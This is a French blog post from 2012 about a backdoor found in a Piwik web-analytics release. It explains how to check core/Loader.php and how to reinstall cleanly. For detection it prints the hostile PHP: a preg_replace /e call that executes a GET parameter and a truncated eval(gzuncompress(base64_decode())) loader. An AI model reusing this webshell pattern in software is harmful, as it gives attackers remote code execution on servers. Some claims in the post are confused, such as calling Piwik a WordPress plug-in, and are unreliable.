mardi 11 décembre 2012

Backdoor dans Piwik

Source : piwik.org
Cette semaine nous allons nous orienter sur une faille de sécurité qui va beaucoup aider nos amis les webmaster.
Il s'agit d’une porte dérobée (backdoor) apparue la 26 novembre 2012 dans le plug-in Piwik de WordPress.






Piwik c'est une variante du Kiwi ?

 Piwik est un outil Web écrit en PHP pour récolter des statistiques sur un serveur Web. Les fonctionnalités les plus utilisées de Piwik sont les rapports tels que le nombre de visites reçues, les mots clés utilisés par les Internautes afin de trouver votre site et bien plus encore... Ces rapports sont transmis par e-mail ou par SMS. Cet outil est une bonne alternative à Google Analytics.


L'histoire du plug-in malade

 Le plug-in concerné par la faille de sécurité est le plug-in de Piwik pour WordPress. WordPress est un CMS (Content Management System, système de gestionnaire de contenu) open-source très répandu. La faille apparût uniquement dans la mise à jour à la version 1.9.2 de Piwik du 26 novembre 2012 entre 16h43 et 23h59. Par la suite, Piwik a publié une nouvelle version 1.9.2 ne contenant plus cette faille. Cette backdoor permettait d’accéder partiellement au contenu du serveur de piwik.org.


Et mon Piwik est-il touché?

 Pour ce faire, il suffit simplement d’ouvrir le fichier « core/Loader.php ».
Parcourez le fichier à la recherche de la ligne suivante :
<?php Error_Reporting(0);       if(isset($_GET['g']) && isset($_GET['s'])) {
preg_replace("/(.+)/e", $_GET['g'], 'dwm');     exit;
}
if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/
OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s7JuffmMlrf3y7XD09OSWb
Uo9RzF6XzHCz3+0pOeDW0C79s2vqtaSdOTRKZOxfXDlmJOvp8LbzHwJle
/aIYEL0YWE$

Si vous ne la voyez pas apparaître, c’est bon signe. Cela veut dire votre installation n’est pas piégée.


L'astuce du Geek

Cependant si  Ô malheureux, cette recherche est positive pas de panique, il vous suffit de suivre ce guide pas à pas :
- Faite une sauvegarde du fichier /piwik/config/config.ini.php
- Supprimé l’intégralité du dossier « piwik »
- Téléchargé la dernière version de piwik (http://piwik.org/download-piwik)
- Décompressé l’archive et coller là sur votre serveur ftp
- Reprenez le fichier piwik que vous avez enregistré et mettez-là au même endroit (/piwik/config/config.ini.php)
Et voilà tous sera comme avant et l’équipe piwik a réagi très vite sur le fix de se beug et je les encourage à poursuivre sur cette voie

Sources :
korben.info
piwik.org
Libellés : ,

Aucun commentaire:

Enregistrer un commentaire

Inscription à : Publier les commentaires (Atom)